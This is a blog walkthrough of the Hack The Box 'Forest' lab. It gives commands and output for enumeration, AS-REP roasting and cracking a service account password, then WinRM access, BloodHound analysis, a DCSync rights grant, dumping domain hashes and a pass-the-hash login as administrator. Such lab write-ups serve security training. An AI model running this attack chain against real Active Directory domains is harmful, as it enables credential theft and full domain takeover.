As usual, first an nmap scan

root@kalivm:~/Forest# nmap -sTV -p 1-65535 -oN fullscan_tcp
Starting Nmap 7.80 ( ) at 2020-01-06 11:47 CET
Nmap scan report for
Host is up (0.016s latency).
Not shown: 65511 closed ports
53/tcp    open  domain?
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2019-10-21 09:54:20Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49674/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc        Microsoft Windows RPC
49682/tcp open  msrpc        Microsoft Windows RPC
49701/tcp open  msrpc        Microsoft Windows RPC
49913/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 159.67 seconds

There are already several interesting things in this result. First of all, this is a domain-connected system with the HTB.local domain. It has exposed kerberos, ldap and SMB services to the outside world and looks like it is a domain controller. And last but not least, a WinRM port is open. This could be an attack similar to the approach I took a long time ago for the ‘Active’ Machine on Hackthebox, combined with the winRM attack on Heist!

PORT 3268 (LDAP)

LDAP stands for Lightweight Directory Access Protocol , it is used for querying /locating data about organizations, individuals and other resources such as files and devices in a network so there is a tool for performing searches for users ,groups and etc.

This is the tool that I found was working , there is no need to clone this simply go to releases and download the compiled binary

windapsearch-linux-amd64 -d 'htb.local' --dc -m users

we could also use enum4linux to see if I can list some more information.

root@kalivm:~/Forest# enum4linux -a
Starting enum4linux v0.8.9 
|    Target Information    |
Target ...........
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
|    Getting domain SID for    |
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)
|    Users on    |
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
|    Password Policy Information for    |
[+] Attaching to using a NULL share
[+] Trying protocol 445/SMB...
[+] Found domain(s):
    [+] HTB
    [+] Builtin
[+] Password Info for Domain: HTB
    [+] Minimum password length: 7
    [+] Password history length: 24
    [+] Maximum password age: 41 days 23 hours 53 minutes 
    [+] Password Complexity Flags: 000000
        [+] Domain Refuse Password Change: 0
        [+] Domain Password Store Cleartext: 0
        [+] Domain Password Lockout Admins: 0
        [+] Domain Password No Clear Change: 0
        [+] Domain Password No Anon Change: 0
        [+] Domain Password Complex: 0
    [+] Minimum password age: 1 day 4 minutes 
    [+] Reset Account Lockout Counter: 30 minutes 
    [+] Locked Account Duration: 30 minutes 
    [+] Account Lockout Threshold: None
    [+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
|    Groups on    |
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
[+] Getting domain group memberships:
Group 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
Group 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Group 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
Group 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Group 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
enum4linux complete on Mon Oct 21 12:05:29 2019

Enum4linux offers many interesting things. First of all I see that there are some users (sebastien, lucinda, andy, mark, santi) present and a clear service account (svc-alfresco).
Furthermore, no password complexity seems to have been enforced, which can mean easy to guess / crack passwords. There seems to be a Microsoft Exchange installation present which is commonly known as a major security vulnerability if not properly configured! And a last line confirms the prompting, Forest is actually part of the group of domain controllers! So I started browsing the impacket tools and trying several until I got to the tool.

└──╼ $python3 -dc-ip -no-pass HTB/sebastien
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation


root@kalivm:~/Forest# -dc-ip -no-pass HTB/lucinda
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for lucinda
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
root@kalivm:~/Forest# -dc-ip -no-pass HTB/svc-alfresco
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for svc-alfresco

After trying it for some users, I finally got a TGT for the user svc-alfresco that I could try cracking with John

└──╼ $john forrest.hash --fork=4 -w=/opt/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads per process (8 total across 4 processes)
Node numbers 1-4 of 4 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice ($krb5asrep$23$svc-alfresco@HTB)
4 1g 0:00:00:02 DONE (2022-09-06 12:12) 0.4504g/s 460108p/s 460108c/s 460108C/s s5210523..s3r10u55
1 0g 0:00:00:07 DONE (2022-09-06 12:12) 0g/s 488548p/s 488548c/s 488548C/s !)KAT9aim.ie168
Waiting for 3 children to terminate
2 0g 0:00:00:07 DONE (2022-09-06 12:12) 0g/s 485899p/s 485899c/s 485899C/s !)!\\.abygurl69
3 0g 0:00:00:07 DONE (2022-09-06 12:12) 0g/s 483932p/s 483932c/s 483932C/s !)&!@!^^^%.a6_123
Session completed

So apparently Alfresco’s password is s3rvice. ll you have to do is get the user hash and start escalating privileges

└──╼ $evil-winrm -i -u svc-alfresco -p s3rvice

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github:

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir

Privilege Escalation

Use Bloodhound and Sharphound.exe the same version !

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> upload SharpHound.exe

Info: Uploading /home/puck/htb/forest/SharpHound.exe to C:\Users\svc-alfresco\Documents\puck\SharpHound.exe

Data: 1395368 bytes of 1395368 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> ./SharpHound.exe
2024-03-23T06:29:47.6623457-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-03-23T06:29:47.7871629-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-03-23T06:29:47.8183965-07:00|INFORMATION|Initializing SharpHound at 6:29 AM on 3/23/2024
2024-03-23T06:29:48.0371459-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for htb.local : FOREST.htb.local
2024-03-23T06:29:48.1621474-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-03-23T06:29:48.6465284-07:00|INFORMATION|Beginning LDAP search for htb.local
2024-03-23T06:29:48.7871527-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-03-23T06:29:48.7871527-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-03-23T06:30:19.3799074-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 41 MB RAM
2024-03-23T06:30:34.9184755-07:00|INFORMATION|Consumers finished, closing output channel
2024-03-23T06:30:34.9809738-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-03-23T06:30:35.1372236-07:00|INFORMATION|Status: 161 objects finished (+161 3.5)/s -- Using 48 MB RAM
2024-03-23T06:30:35.1372236-07:00|INFORMATION|Enumeration finished in 00:00:46.4988600
2024-03-23T06:30:35.2153513-07:00|INFORMATION|Saving cache with stats: 118 ID to type mappings.
117 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2024-03-23T06:30:35.2309746-07:00|INFORMATION|SharpHound Enumeration Completed at 6:30 AM on 3/23/2024! Happy Graphing!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> ls

Directory: C:\Users\svc-alfresco\Documents\puck

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/23/2024 6:30 AM 18835
-a---- 3/23/2024 6:30 AM 19538 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a---- 3/23/2024 6:29 AM 1046528 SharpHound.exe

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> download

Info: Downloading C:\Users\svc-alfresco\Documents\puck\ to

Info: Download successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck>

Then load the zip file  directly into BloodHound by simply dragging

Putting all the pieces together, the following is our attack path.

  1. Create a user on the domain. This is possible because svc-alfresco is a member of the group Account Operators.
  2. Add the user to the Exchange Windows Permission group. This is possible because svc-alfresco has GenericAll permissions on the Exchange Windows Permissions group.
  3. Give the user DcSync privileges. This is possible because the user is a part of the Exchange Windows Permissions group which has WriteDacl permission on the htb.local domain.
  4. Perform a DcSync attack and dump the password hashes of all the users on the domain.
  5. Perform a Pass the Hash attack to get access to the administrator’s account.

Alright, let’s get started.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> net user puck Password /add /domain
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> net users /domain

User accounts for \\

$331000-VK4ADACQNUCA Administrator andy
DefaultAccount Guest HealthMailbox0659cc1
HealthMailbox670628e HealthMailbox6ded678 HealthMailbox7108a4e
HealthMailbox83d6781 HealthMailbox968e74d HealthMailboxb01ac64
HealthMailboxc0a90c9 HealthMailboxc3d7722 HealthMailboxfc9daad
HealthMailboxfd87238 krbtgt lucinda
mark puck santi
sebastien SM_1b41c9286325456bb SM_1ffab36a2f5f479cb
SM_2c8eef0a09b545acb SM_681f53d4942840e18 SM_75a538d3025e4db9a
SM_7c96b981967141ebb SM_9b69f1b9d2cc45549 SM_c75ee099d0a64c91b
SM_ca8c2ed5bdab4dc9b svc-alfresco
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> net group

Group Accounts for \\

*Cloneable Domain Controllers
*Compliance Management
*Delegated Setup
*Discovery Management
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Exchange Servers
*Exchange Trusted Subsystem
*Exchange Windows Permissions
*Group Policy Creator Owners
*Help Desk
*Hygiene Management
*Key Admins
*Managed Availability Servers
*Organization Management
*Privileged IT Accounts
*Protected Users
*Public Folder Management
*Read-only Domain Controllers
*Recipient Management
*Records Management
*Schema Admins
*Security Administrator
*Security Reader
*Server Management
*Service Accounts
*UM Management
*View-Only Organization Management
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> net group "Exchange Windows Permissions" /add puck
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck>
$pass = convertto-securestring 'Password' -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential('htb\puck', $pass)

Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity puck -Rights DCSync
and then dump
└─$ python3 puck:Password@ 
Impacket v0.9.25.dev1+20230823.145202.4518279 - Copyright 2021 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Cleaning up... 



└──╼ $evil-winrm -i -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github:

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>



Author: Puckiestyle

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *